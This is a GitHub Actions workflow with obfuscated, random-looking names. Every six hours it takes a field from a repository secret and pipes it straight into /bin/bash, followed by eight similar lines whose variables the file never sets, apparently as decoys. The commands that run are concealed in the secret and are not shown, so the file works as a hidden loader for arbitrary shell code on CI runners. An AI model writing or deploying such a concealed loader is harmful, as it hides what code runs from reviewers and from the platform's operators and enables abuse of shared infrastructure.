name: zhoubozou

on:
  workflow_dispatch:
  schedule:
    - cron: '1 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoubozou
        env:
          heulb9: ${{ secrets.heulb9 }}
        run: |
          echo $heulb9 | jq -r .wir589 | /bin/bash
          echo $nlo08437 | jq -r .vmpcq95 | /bin/bash
          echo $ko25384 | jq -r .i4 | /bin/bash
          echo $t469 | jq -r .j31 | /bin/bash
          echo $x799 | jq -r .rufnf0 | /bin/bash
          echo $jfvh33122 | jq -r .up7052 | /bin/bash
          echo $oj61 | jq -r .fik6337 | /bin/bash
          echo $ekhh0 | jq -r .syyvg245 | /bin/bash
          echo $z076 | jq -r .l72411 | /bin/bash

